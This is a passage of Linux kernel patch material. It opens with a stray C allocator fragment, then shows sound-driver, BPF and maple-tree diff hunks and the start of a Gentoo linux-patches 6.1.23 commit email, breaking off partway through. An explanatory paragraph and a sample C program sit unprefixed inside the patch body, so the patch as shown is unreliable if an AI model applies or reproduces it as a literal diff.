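static void slot_put(struct slot_alloc *a, int idx)
{
    a->bitmap &= ~(1UL << idx);
    a->prev_idx = idx;                /* remember for the next grab */
}

int main(void)
{
    struct slot_alloc a = { .bitmap = 0, .prev_idx = -1 };
    int first = slot_get(&a);

    slot_put(&a, first);
    printf("first=%d again=%d\n", first, slot_get(&a)); /* same slot */
    return 0;
}
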
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 070150bbd3559..50b8573b52066 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -2624,6 +2624,7 @@ static const struct snd_pci_quirk alc882_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1462, 0xda57, "MSI Z270-Gaming", ALC1220_FIXUP_GB_DUAL_CODECS),
+ 	SND_PCI_QUIRK_VENDOR(0x1462, "MSI", ALC882_FIXUP_GPIO3),
+ 	SND_PCI_QUIRK(0x147b, 0x107a, "Abit AW9D-MAX", ALC882_FIXUP_ABIT_AW9D_MAX),
++	SND_PCI_QUIRK(0x1558, 0x3702, "Clevo X370SN[VW]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x50d3, "Clevo PC50[ER][CDF]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x65d1, "Clevo PB51[ER][CDF]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x65d2, "Clevo PB51R[CDF]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+@@ -9442,6 +9443,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b47, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5d, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5e, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8b66, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7a, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7d, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b87, "HP", ALC236_FIXUP_HP_GPIO_LED),
+diff --git a/sound/soc/codecs/hdac_hdmi.c b/sound/soc/codecs/hdac_hdmi.c
+index cb23650ad5223..d8e83150ea28e 100644
+--- a/sound/soc/codecs/hdac_hdmi.c
++++ b/sound/soc/codecs/hdac_hdmi.c
+@@ -436,23 +436,28 @@ static int hdac_hdmi_setup_audio_infoframe(struct hdac_device *hdev,
+ 	return 0;
+ }
+ 
+-static int hdac_hdmi_set_tdm_slot(struct snd_soc_dai *dai,
+-		unsigned int tx_mask, unsigned int rx_mask,
+-		int slots, int slot_width)
++static int hdac_hdmi_set_stream(struct snd_soc_dai *dai,
++				void *stream, int direction)
+ {
+ 	struct hdac_hdmi_priv *hdmi = snd_soc_dai_get_drvdata(dai);
+ 	struct hdac_device *hdev = hdmi->hdev;
+ 	struct hdac_hdmi_dai_port_map *dai_map;
+ 	struct hdac_hdmi_pcm *pcm;
++	struct hdac_stream *hstream;
+ 
+-	dev_dbg(&hdev->dev, "%s: strm_tag: %d\n", __func__, tx_mask);
++	if (!stream)
++		return -EINVAL;
++
++	hstream = (struct hdac_stream *)stream;
++
++	dev_dbg(&hdev->dev, "%s: strm_tag: %d\n", __func__, hstream->stream_tag);
+ 
+ 	dai_map = &hdmi->dai_map[dai->id];
+ 
+ 	pcm = hdac_hdmi_get_pcm_from_cvt(hdmi, dai_map->cvt);
+ 
+ 	if (pcm)
+-		pcm->stream_tag = (tx_mask << 4);
++		pcm->stream_tag = (hstream->stream_tag << 4);
+ 
+ 	return 0;
+ }
+@@ -1544,7 +1549,7 @@ static const struct snd_soc_dai_ops hdmi_dai_ops = {
+ 	.startup = hdac_hdmi_pcm_open,
+ 	.shutdown = hdac_hdmi_pcm_close,
+ 	.hw_params = hdac_hdmi_set_hw_params,
+-	.set_tdm_slot = hdac_hdmi_set_tdm_slot,
++	.set_stream = hdac_hdmi_set_stream,
+ };
+ 
+ /*
+diff --git a/sound/soc/codecs/lpass-rx-macro.c b/sound/soc/codecs/lpass-rx-macro.c
+index 8621cfabcf5b6..1639f3b66facb 100644
+--- a/sound/soc/codecs/lpass-rx-macro.c
++++ b/sound/soc/codecs/lpass-rx-macro.c
+@@ -3667,9 +3667,9 @@ static int __maybe_unused rx_macro_runtime_suspend(struct device *dev)
+ 	regcache_cache_only(rx->regmap, true);
+ 	regcache_mark_dirty(rx->regmap);
+ 
+-	clk_disable_unprepare(rx->mclk);
+-	clk_disable_unprepare(rx->npl);
+ 	clk_disable_unprepare(rx->fsgen);
++	clk_disable_unprepare(rx->npl);
++	clk_disable_unprepare(rx->mclk);
+ 
+ 	return 0;
+ }
+diff --git a/sound/soc/codecs/lpass-tx-macro.c b/sound/soc/codecs/lpass-tx-macro.c
+index e5611f655beda..d1d9d8d2df2d2 100644
+--- a/sound/soc/codecs/lpass-tx-macro.c
++++ b/sound/soc/codecs/lpass-tx-macro.c
+@@ -1946,9 +1946,9 @@ static int __maybe_unused tx_macro_runtime_suspend(struct device *dev)
+ 	regcache_cache_only(tx->regmap, true);
+ 	regcache_mark_dirty(tx->regmap);
+ 
+-	clk_disable_unprepare(tx->mclk);
+-	clk_disable_unprepare(tx->npl);
+ 	clk_disable_unprepare(tx->fsgen);
++	clk_disable_unprepare(tx->npl);
++	clk_disable_unprepare(tx->mclk);
+ 
+ 	return 0;
+ }
+diff --git a/sound/soc/codecs/lpass-wsa-macro.c b/sound/soc/codecs/lpass-wsa-macro.c
+index c012033fb69ed..8ed48c86ccb33 100644
+--- a/sound/soc/codecs/lpass-wsa-macro.c
++++ b/sound/soc/codecs/lpass-wsa-macro.c
+@@ -2502,9 +2502,9 @@ static int __maybe_unused wsa_macro_runtime_suspend(struct device *dev)
+ 	regcache_cache_only(wsa->regmap, true);
+ 	regcache_mark_dirty(wsa->regmap);
+ 
+-	clk_disable_unprepare(wsa->mclk);
+-	clk_disable_unprepare(wsa->npl);
+ 	clk_disable_unprepare(wsa->fsgen);
++	clk_disable_unprepare(wsa->npl);
++	clk_disable_unprepare(wsa->mclk);
+ 
+ 	return 0;
+ }
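
All three lpass macro hunks apply the same fix: the clocks are now released in the reverse of the order they were prepared, children (fsgen, npl) before the parent (mclk). The snippet below is a minimal sketch of that acquire-in-order, release-in-reverse discipline with the usual goto unwind; the resource names are made up for illustration.

/* Minimal sketch of the teardown-ordering rule the lpass-*-macro.c
 * hunks restore: the goto ladder guarantees that error unwinding and
 * shutdown always run as the mirror image of setup.
 */
#include <stdio.h>

static int enable(const char *name) { printf("enable  %s\n", name); return 0; }
static void disable(const char *name) { printf("disable %s\n", name); }

static int codec_power_on(void)
{
    int ret;

    ret = enable("mclk");           /* parent clock first */
    if (ret)
        return ret;
    ret = enable("npl");            /* derived from mclk */
    if (ret)
        goto err_npl;
    ret = enable("fsgen");          /* derived from npl */
    if (ret)
        goto err_fsgen;
    return 0;

err_fsgen:
    disable("npl");
err_npl:
    disable("mclk");
    return ret;
}

static void codec_power_off(void)
{
    /* Reverse order: children before parents. */
    disable("fsgen");
    disable("npl");
    disable("mclk");
}

int main(void)
{
    if (codec_power_on() == 0)
        codec_power_off();
    return 0;
}
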
+diff --git a/sound/soc/sof/ipc4.c b/sound/soc/sof/ipc4.c
+index 6eaa18e27e5af..c08f3960ddd96 100644
+--- a/sound/soc/sof/ipc4.c
++++ b/sound/soc/sof/ipc4.c
+@@ -392,6 +392,9 @@ static int sof_ipc4_tx_msg(struct snd_sof_dev *sdev, void *msg_data, size_t msg_
+ static int sof_ipc4_set_get_data(struct snd_sof_dev *sdev, void *data,
+ 				 size_t payload_bytes, bool set)
+ {
++	const struct sof_dsp_power_state target_state = {
++			.state = SOF_DSP_PM_D0,
++	};
+ 	size_t payload_limit = sdev->ipc->max_payload_size;
+ 	struct sof_ipc4_msg *ipc4_msg = data;
+ 	struct sof_ipc4_msg tx = {{ 0 }};
+@@ -422,6 +425,11 @@ static int sof_ipc4_set_get_data(struct snd_sof_dev *sdev, void *data,
+ 
+ 	tx.extension |= SOF_IPC4_MOD_EXT_MSG_FIRST_BLOCK(1);
+ 
++	/* ensure the DSP is in D0i0 before sending IPC */
++	ret = snd_sof_dsp_set_power_state(sdev, &target_state);
++	if (ret < 0)
++		return ret;
++
+ 	/* Serialise IPC TX */
+ 	mutex_lock(&sdev->ipc->tx_mutex);
+ 
+diff --git a/tools/lib/bpf/btf_dump.c b/tools/lib/bpf/btf_dump.c
+index 56102711f395a..80a15a6802094 100644
+--- a/tools/lib/bpf/btf_dump.c
++++ b/tools/lib/bpf/btf_dump.c
+@@ -1011,7 +1011,11 @@ static void btf_dump_emit_struct_def(struct btf_dump *d,
+ 	if (is_struct)
+ 		btf_dump_emit_bit_padding(d, off, t->size * 8, align, false, lvl + 1);
+ 
+-	if (vlen)
++	/*
++	 * Keep `struct empty {}` on a single line,
++	 * only print newline when there are regular or padding fields.
++	 */
++	if (vlen || t->size)
+ 		btf_dump_printf(d, "\n");
+ 	btf_dump_printf(d, "%s}", pfx(lvl));
+ 	if (packed)
+diff --git a/tools/testing/radix-tree/maple.c b/tools/testing/radix-tree/maple.c
+index 2e91973fbaa66..aceb6011315c2 100644
+--- a/tools/testing/radix-tree/maple.c
++++ b/tools/testing/radix-tree/maple.c
+@@ -172,11 +172,11 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 
+ 		if (!MAPLE_32BIT) {
+ 			if (i >= 35)
+-				e = i - 35;
++				e = i - 34;
+ 			else if (i >= 5)
+-				e = i - 5;
++				e = i - 4;
+ 			else if (i >= 2)
+-				e = i - 2;
++				e = i - 1;
+ 		} else {
+ 			if (i >= 4)
+ 				e = i - 4;
+@@ -304,17 +304,17 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 	MT_BUG_ON(mt, mas.node != MA_ERROR(-ENOMEM));
+ 	MT_BUG_ON(mt, !mas_nomem(&mas, GFP_KERNEL));
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS + 1);
+-	MT_BUG_ON(mt, mas.alloc->node_count != MAPLE_ALLOC_SLOTS - 1);
++	MT_BUG_ON(mt, mas.alloc->node_count != MAPLE_ALLOC_SLOTS);
+ 
+ 	mn = mas_pop_node(&mas); /* get the next node. */
+ 	MT_BUG_ON(mt, mn == NULL);
+ 	MT_BUG_ON(mt, not_empty(mn));
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS);
+-	MT_BUG_ON(mt, mas.alloc->node_count != MAPLE_ALLOC_SLOTS - 2);
++	MT_BUG_ON(mt, mas.alloc->node_count != MAPLE_ALLOC_SLOTS - 1);
+ 
+ 	mas_push_node(&mas, mn);
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS + 1);
+-	MT_BUG_ON(mt, mas.alloc->node_count != MAPLE_ALLOC_SLOTS - 1);
++	MT_BUG_ON(mt, mas.alloc->node_count != MAPLE_ALLOC_SLOTS);
+ 
+ 	/* Check the limit of pop/push/pop */
+ 	mas_node_count(&mas, MAPLE_ALLOC_SLOTS + 2); /* Request */
+@@ -322,14 +322,14 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 	MT_BUG_ON(mt, mas.node != MA_ERROR(-ENOMEM));
+ 	MT_BUG_ON(mt, !mas_nomem(&mas, GFP_KERNEL));
+ 	MT_BUG_ON(mt, mas_alloc_req(&mas));
+-	MT_BUG_ON(mt, mas.alloc->node_count);
++	MT_BUG_ON(mt, mas.alloc->node_count != 1);
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS + 2);
+ 	mn = mas_pop_node(&mas);
+ 	MT_BUG_ON(mt, not_empty(mn));
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS + 1);
+-	MT_BUG_ON(mt, mas.alloc->node_count  != MAPLE_ALLOC_SLOTS - 1);
++	MT_BUG_ON(mt, mas.alloc->node_count  != MAPLE_ALLOC_SLOTS);
+ 	mas_push_node(&mas, mn);
+-	MT_BUG_ON(mt, mas.alloc->node_count);
++	MT_BUG_ON(mt, mas.alloc->node_count != 1);
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS + 2);
+ 	mn = mas_pop_node(&mas);
+ 	MT_BUG_ON(mt, not_empty(mn));


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-04-06 10:41 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2023-04-06 10:41 UTC (permalink / raw
  To: gentoo-commits

commit:     f97107ed670fe757007eb080b0b2accc643d82f2
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Thu Apr  6 10:40:48 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Thu Apr  6 10:40:48 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=f97107ed

Linux patch 6.1.23

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README             |     4 +
 1022_linux-6.1.23.patch | 10192 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 10196 insertions(+)

diff --git a/0000_README b/0000_README
index dac87a0b..82189ada 100644
--- a/0000_README
+++ b/0000_README
@@ -131,6 +131,10 @@ Patch:  1021_linux-6.1.22.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.22
 
+Patch:  1022_linux-6.1.23.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.23
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1022_linux-6.1.23.patch b/1022_linux-6.1.23.patch
new file mode 100644
index 00000000..885f13e9
--- /dev/null
+++ b/1022_linux-6.1.23.patch
@@ -0,0 +1,10192 @@
+diff --git a/Documentation/devicetree/bindings/mtd/jedec,spi-nor.yaml b/Documentation/devicetree/bindings/mtd/jedec,spi-nor.yaml
+index 7149784a36ac7..3ee77af5a74cf 100644
+--- a/Documentation/devicetree/bindings/mtd/jedec,spi-nor.yaml
++++ b/Documentation/devicetree/bindings/mtd/jedec,spi-nor.yaml
+@@ -84,6 +84,13 @@ patternProperties:
+   "^otp(-[0-9]+)?$":
+     type: object
+ 
++  spi-cpol: true
++  spi-cpha: true
++
++dependencies:
++  spi-cpol: [ spi-cpha ]
++  spi-cpha: [ spi-cpol ]
++
+ unevaluatedProperties: false
+ 
+ examples:
+diff --git a/Makefile b/Makefile
+index c3d44de8850cf..a162f6cdf77c6 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 22
++SUBLEVEL = 23
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/aspeed-bmc-ibm-everest.dts b/arch/arm/boot/dts/aspeed-bmc-ibm-everest.dts
+index fcc890e3ad735..f11feb98fde33 100644
+--- a/arch/arm/boot/dts/aspeed-bmc-ibm-everest.dts
++++ b/arch/arm/boot/dts/aspeed-bmc-ibm-everest.dts
+@@ -244,7 +244,7 @@
+ 		};
+ 	};
+ 
+-	iio-hwmon-battery {
++	iio-hwmon {
+ 		compatible = "iio-hwmon";
+ 		io-channels = <&adc1 7>;
+ 	};
+diff --git a/arch/arm/boot/dts/aspeed-bmc-ibm-rainier.dts b/arch/arm/boot/dts/aspeed-bmc-ibm-rainier.dts
+index 4879da4cdbd25..77a3a27b04e26 100644
+--- a/arch/arm/boot/dts/aspeed-bmc-ibm-rainier.dts
++++ b/arch/arm/boot/dts/aspeed-bmc-ibm-rainier.dts
+@@ -220,7 +220,7 @@
+ 		};
+ 	};
+ 
+-	iio-hwmon-battery {
++	iio-hwmon {
+ 		compatible = "iio-hwmon";
+ 		io-channels = <&adc1 7>;
+ 	};
+diff --git a/arch/arm64/kernel/efi-header.S b/arch/arm64/kernel/efi-header.S
+index 28d8a5dca5f12..d731b4655df8e 100644
+--- a/arch/arm64/kernel/efi-header.S
++++ b/arch/arm64/kernel/efi-header.S
+@@ -66,7 +66,7 @@
+ 	.long	.Lefi_header_end - .L_head		// SizeOfHeaders
+ 	.long	0					// CheckSum
+ 	.short	IMAGE_SUBSYSTEM_EFI_APPLICATION		// Subsystem
+-	.short	0					// DllCharacteristics
++	.short	IMAGE_DLL_CHARACTERISTICS_NX_COMPAT	// DllCharacteristics
+ 	.quad	0					// SizeOfStackReserve
+ 	.quad	0					// SizeOfStackCommit
+ 	.quad	0					// SizeOfHeapReserve
+diff --git a/arch/arm64/kvm/mmu.c b/arch/arm64/kvm/mmu.c
+index 2c3759f1f2c56..019472dd98ff7 100644
+--- a/arch/arm64/kvm/mmu.c
++++ b/arch/arm64/kvm/mmu.c
+@@ -646,14 +646,33 @@ static int get_user_mapping_size(struct kvm *kvm, u64 addr)
+ 				   CONFIG_PGTABLE_LEVELS),
+ 		.mm_ops		= &kvm_user_mm_ops,
+ 	};
++	unsigned long flags;
+ 	kvm_pte_t pte = 0;	/* Keep GCC quiet... */
+ 	u32 level = ~0;
+ 	int ret;
+ 
++	/*
++	 * Disable IRQs so that we hazard against a concurrent
++	 * teardown of the userspace page tables (which relies on
++	 * IPI-ing threads).
++	 */
++	local_irq_save(flags);
+ 	ret = kvm_pgtable_get_leaf(&pgt, addr, &pte, &level);
+-	VM_BUG_ON(ret);
+-	VM_BUG_ON(level >= KVM_PGTABLE_MAX_LEVELS);
+-	VM_BUG_ON(!(pte & PTE_VALID));
++	local_irq_restore(flags);
++
++	if (ret)
++		return ret;
++
++	/*
++	 * Not seeing an error, but not updating level? Something went
++	 * deeply wrong...
++	 */
++	if (WARN_ON(level >= KVM_PGTABLE_MAX_LEVELS))
++		return -EFAULT;
++
++	/* Oops, the userspace PTs are gone... Replay the fault */
++	if (!kvm_pte_valid(pte))
++		return -EAGAIN;
+ 
+ 	return BIT(ARM64_HW_PGTABLE_LEVEL_SHIFT(level));
+ }
+@@ -1006,7 +1025,7 @@ static bool fault_supports_stage2_huge_mapping(struct kvm_memory_slot *memslot,
+  *
+  * Returns the size of the mapping.
+  */
+-static unsigned long
++static long
+ transparent_hugepage_adjust(struct kvm *kvm, struct kvm_memory_slot *memslot,
+ 			    unsigned long hva, kvm_pfn_t *pfnp,
+ 			    phys_addr_t *ipap)
+@@ -1018,8 +1037,15 @@ transparent_hugepage_adjust(struct kvm *kvm, struct kvm_memory_slot *memslot,
+ 	 * sure that the HVA and IPA are sufficiently aligned and that the
+ 	 * block map is contained within the memslot.
+ 	 */
+-	if (fault_supports_stage2_huge_mapping(memslot, hva, PMD_SIZE) &&
+-	    get_user_mapping_size(kvm, hva) >= PMD_SIZE) {
++	if (fault_supports_stage2_huge_mapping(memslot, hva, PMD_SIZE)) {
++		int sz = get_user_mapping_size(kvm, hva);
++
++		if (sz < 0)
++			return sz;
++
++		if (sz < PMD_SIZE)
++			return PAGE_SIZE;
++
+ 		/*
+ 		 * The address we faulted on is backed by a transparent huge
+ 		 * page.  However, because we map the compound huge page and
+@@ -1138,7 +1164,7 @@ static int user_mem_abort(struct kvm_vcpu *vcpu, phys_addr_t fault_ipa,
+ 	bool logging_active = memslot_is_logging(memslot);
+ 	bool use_read_lock = false;
+ 	unsigned long fault_level = kvm_vcpu_trap_get_fault_level(vcpu);
+-	unsigned long vma_pagesize, fault_granule;
++	long vma_pagesize, fault_granule;
+ 	enum kvm_pgtable_prot prot = KVM_PGTABLE_PROT_R;
+ 	struct kvm_pgtable *pgt;
+ 
+@@ -1295,6 +1321,11 @@ static int user_mem_abort(struct kvm_vcpu *vcpu, phys_addr_t fault_ipa,
+ 			vma_pagesize = transparent_hugepage_adjust(kvm, memslot,
+ 								   hva, &pfn,
+ 								   &fault_ipa);
++
++		if (vma_pagesize < 0) {
++			ret = vma_pagesize;
++			goto out_unlock;
++		}
+ 	}
+ 
+ 	if (fault_status != FSC_PERM && !device && kvm_has_mte(kvm)) {
+diff --git a/arch/arm64/kvm/sys_regs.c b/arch/arm64/kvm/sys_regs.c
+index f4a7c5abcbca4..bfe4f17232b3e 100644
+--- a/arch/arm64/kvm/sys_regs.c
++++ b/arch/arm64/kvm/sys_regs.c
+@@ -767,6 +767,22 @@ static bool pmu_counter_idx_valid(struct kvm_vcpu *vcpu, u64 idx)
+ 	return true;
+ }
+ 
++static int get_pmu_evcntr(struct kvm_vcpu *vcpu, const struct sys_reg_desc *r,
++			  u64 *val)
++{
++	u64 idx;
++
++	if (r->CRn == 9 && r->CRm == 13 && r->Op2 == 0)
++		/* PMCCNTR_EL0 */
++		idx = ARMV8_PMU_CYCLE_IDX;
++	else
++		/* PMEVCNTRn_EL0 */
++		idx = ((r->CRm & 3) << 3) | (r->Op2 & 7);
++
++	*val = kvm_pmu_get_counter_value(vcpu, idx);
++	return 0;
++}
++
+ static bool access_pmu_evcntr(struct kvm_vcpu *vcpu,
+ 			      struct sys_reg_params *p,
+ 			      const struct sys_reg_desc *r)
+@@ -983,7 +999,7 @@ static bool access_pmuserenr(struct kvm_vcpu *vcpu, struct sys_reg_params *p,
+ /* Macro to expand the PMEVCNTRn_EL0 register */
+ #define PMU_PMEVCNTR_EL0(n)						\
+ 	{ PMU_SYS_REG(SYS_PMEVCNTRn_EL0(n)),				\
+-	  .reset = reset_pmevcntr,					\
++	  .reset = reset_pmevcntr, .get_user = get_pmu_evcntr,		\
+ 	  .access = access_pmu_evcntr, .reg = (PMEVCNTR0_EL0 + n), }
+ 
+ /* Macro to expand the PMEVTYPERn_EL0 register */
+@@ -1632,7 +1648,8 @@ static const struct sys_reg_desc sys_reg_descs[] = {
+ 	{ PMU_SYS_REG(SYS_PMCEID1_EL0),
+ 	  .access = access_pmceid, .reset = NULL },
+ 	{ PMU_SYS_REG(SYS_PMCCNTR_EL0),
+-	  .access = access_pmu_evcntr, .reset = reset_unknown, .reg = PMCCNTR_EL0 },
++	  .access = access_pmu_evcntr, .reset = reset_unknown,
++	  .reg = PMCCNTR_EL0, .get_user = get_pmu_evcntr},
+ 	{ PMU_SYS_REG(SYS_PMXEVTYPER_EL0),
+ 	  .access = access_pmu_evtyper, .reset = NULL },
+ 	{ PMU_SYS_REG(SYS_PMXEVCNTR_EL0),
+diff --git a/arch/mips/bmips/dma.c b/arch/mips/bmips/dma.c
+index 33788668cbdbf..3779e7855bd75 100644
+--- a/arch/mips/bmips/dma.c
++++ b/arch/mips/bmips/dma.c
+@@ -5,6 +5,8 @@
+ #include <asm/bmips.h>
+ #include <asm/io.h>
+ 
++bool bmips_rac_flush_disable;
++
+ void arch_sync_dma_for_cpu_all(void)
+ {
+ 	void __iomem *cbr = BMIPS_GET_CBR();
+@@ -15,6 +17,9 @@ void arch_sync_dma_for_cpu_all(void)
+ 	    boot_cpu_type() != CPU_BMIPS4380)
+ 		return;
+ 
++	if (unlikely(bmips_rac_flush_disable))
++		return;
++
+ 	/* Flush stale data out of the readahead cache */
+ 	cfg = __raw_readl(cbr + BMIPS_RAC_CONFIG);
+ 	__raw_writel(cfg | 0x100, cbr + BMIPS_RAC_CONFIG);
+diff --git a/arch/mips/bmips/setup.c b/arch/mips/bmips/setup.c
+index e95b3f78e7cd4..549a6392a3d2d 100644
+--- a/arch/mips/bmips/setup.c
++++ b/arch/mips/bmips/setup.c
+@@ -35,6 +35,8 @@
+ #define REG_BCM6328_OTP		((void __iomem *)CKSEG1ADDR(0x1000062c))
+ #define BCM6328_TP1_DISABLED	BIT(9)
+ 
++extern bool bmips_rac_flush_disable;
++
+ static const unsigned long kbase = VMLINUX_LOAD_ADDRESS & 0xfff00000;
+ 
+ struct bmips_quirk {
+@@ -104,6 +106,12 @@ static void bcm6358_quirks(void)
+ 	 * disable SMP for now
+ 	 */
+ 	bmips_smp_enabled = 0;
++
++	/*
++	 * RAC flush causes kernel panics on BCM6358 when booting from TP1
++	 * because the bootloader is not initializing it properly.
++	 */
++	bmips_rac_flush_disable = !!(read_c0_brcm_cmt_local() & (1 << 31));
+ }
+ 
+ static void bcm6368_quirks(void)
+diff --git a/arch/powerpc/include/asm/book3s/64/tlbflush.h b/arch/powerpc/include/asm/book3s/64/tlbflush.h
+index 67655cd605456..985bd8e69bdc2 100644
+--- a/arch/powerpc/include/asm/book3s/64/tlbflush.h
++++ b/arch/powerpc/include/asm/book3s/64/tlbflush.h
+@@ -163,6 +163,11 @@ static inline void flush_tlb_fix_spurious_fault(struct vm_area_struct *vma,
+ 	 */
+ }
+ 
++static inline bool __pte_protnone(unsigned long pte)
++{
++	return (pte & (pgprot_val(PAGE_NONE) | _PAGE_RWX)) == pgprot_val(PAGE_NONE);
++}
++
+ static inline bool __pte_flags_need_flush(unsigned long oldval,
+ 					  unsigned long newval)
+ {
+@@ -179,8 +184,8 @@ static inline bool __pte_flags_need_flush(unsigned long oldval,
+ 	/*
+ 	 * We do not expect kernel mappings or non-PTEs or not-present PTEs.
+ 	 */
+-	VM_WARN_ON_ONCE(oldval & _PAGE_PRIVILEGED);
+-	VM_WARN_ON_ONCE(newval & _PAGE_PRIVILEGED);
++	VM_WARN_ON_ONCE(!__pte_protnone(oldval) && oldval & _PAGE_PRIVILEGED);
++	VM_WARN_ON_ONCE(!__pte_protnone(newval) && newval & _PAGE_PRIVILEGED);
+ 	VM_WARN_ON_ONCE(!(oldval & _PAGE_PTE));
+ 	VM_WARN_ON_ONCE(!(newval & _PAGE_PTE));
+ 	VM_WARN_ON_ONCE(!(oldval & _PAGE_PRESENT));
+diff --git a/arch/powerpc/kernel/ptrace/ptrace-view.c b/arch/powerpc/kernel/ptrace/ptrace-view.c
+index 076d867412c70..31876db8e996f 100644
+--- a/arch/powerpc/kernel/ptrace/ptrace-view.c
++++ b/arch/powerpc/kernel/ptrace/ptrace-view.c
+@@ -290,6 +290,9 @@ static int gpr_set(struct task_struct *target, const struct user_regset *regset,
+ static int ppr_get(struct task_struct *target, const struct user_regset *regset,
+ 		   struct membuf to)
+ {
++	if (!target->thread.regs)
++		return -EINVAL;
++
+ 	return membuf_write(&to, &target->thread.regs->ppr, sizeof(u64));
+ }
+ 
+@@ -297,6 +300,9 @@ static int ppr_set(struct task_struct *target, const struct user_regset *regset,
+ 		   unsigned int pos, unsigned int count, const void *kbuf,
+ 		   const void __user *ubuf)
+ {
++	if (!target->thread.regs)
++		return -EINVAL;
++
+ 	return user_regset_copyin(&pos, &count, &kbuf, &ubuf,
+ 				  &target->thread.regs->ppr, 0, sizeof(u64));
+ }
+diff --git a/arch/powerpc/platforms/pseries/vas.c b/arch/powerpc/platforms/pseries/vas.c
+index 4ad6e510d405f..94c023bb13e05 100644
+--- a/arch/powerpc/platforms/pseries/vas.c
++++ b/arch/powerpc/platforms/pseries/vas.c
+@@ -857,6 +857,13 @@ int pseries_vas_dlpar_cpu(void)
+ {
+ 	int new_nr_creds, rc;
+ 
++	/*
++	 * NX-GZIP is not enabled. Nothing to do for DLPAR event
++	 */
++	if (!copypaste_feat)
++		return 0;
++
++
+ 	rc = h_query_vas_capabilities(H_QUERY_VAS_CAPABILITIES,
+ 				      vascaps[VAS_GZIP_DEF_FEAT_TYPE].feat,
+ 				      (u64)virt_to_phys(&hv_cop_caps));
+@@ -1013,6 +1020,7 @@ static int __init pseries_vas_init(void)
+ 	 * Linux supports user space COPY/PASTE only with Radix
+ 	 */
+ 	if (!radix_enabled()) {
++		copypaste_feat = false;
+ 		pr_err("API is supported only with radix page tables\n");
+ 		return -ENOTSUPP;
+ 	}
+diff --git a/arch/riscv/Kconfig b/arch/riscv/Kconfig
+index ae11d5647f9d4..06b9b2f60b9fb 100644
+--- a/arch/riscv/Kconfig
++++ b/arch/riscv/Kconfig
+@@ -278,7 +278,7 @@ config ARCH_RV64I
+ 	select HAVE_DYNAMIC_FTRACE_WITH_REGS if HAVE_DYNAMIC_FTRACE
+ 	select HAVE_FTRACE_MCOUNT_RECORD if !XIP_KERNEL
+ 	select HAVE_FUNCTION_GRAPH_TRACER
+-	select HAVE_FUNCTION_TRACER if !XIP_KERNEL
++	select HAVE_FUNCTION_TRACER if !XIP_KERNEL && !PREEMPTION
+ 	select SWIOTLB if MMU
+ 
+ endchoice
+diff --git a/arch/riscv/kvm/vcpu_timer.c b/arch/riscv/kvm/vcpu_timer.c
+index ad34519c8a13d..3ac2ff6a65dac 100644
+--- a/arch/riscv/kvm/vcpu_timer.c
++++ b/arch/riscv/kvm/vcpu_timer.c
+@@ -147,10 +147,8 @@ static void kvm_riscv_vcpu_timer_blocking(struct kvm_vcpu *vcpu)
+ 		return;
+ 
+ 	delta_ns = kvm_riscv_delta_cycles2ns(t->next_cycles, gt, t);
+-	if (delta_ns) {
+-		hrtimer_start(&t->hrt, ktime_set(0, delta_ns), HRTIMER_MODE_REL);
+-		t->next_set = true;
+-	}
++	hrtimer_start(&t->hrt, ktime_set(0, delta_ns), HRTIMER_MODE_REL);
++	t->next_set = true;
+ }
+ 
+ static void kvm_riscv_vcpu_timer_unblocking(struct kvm_vcpu *vcpu)
+diff --git a/arch/s390/Makefile b/arch/s390/Makefile
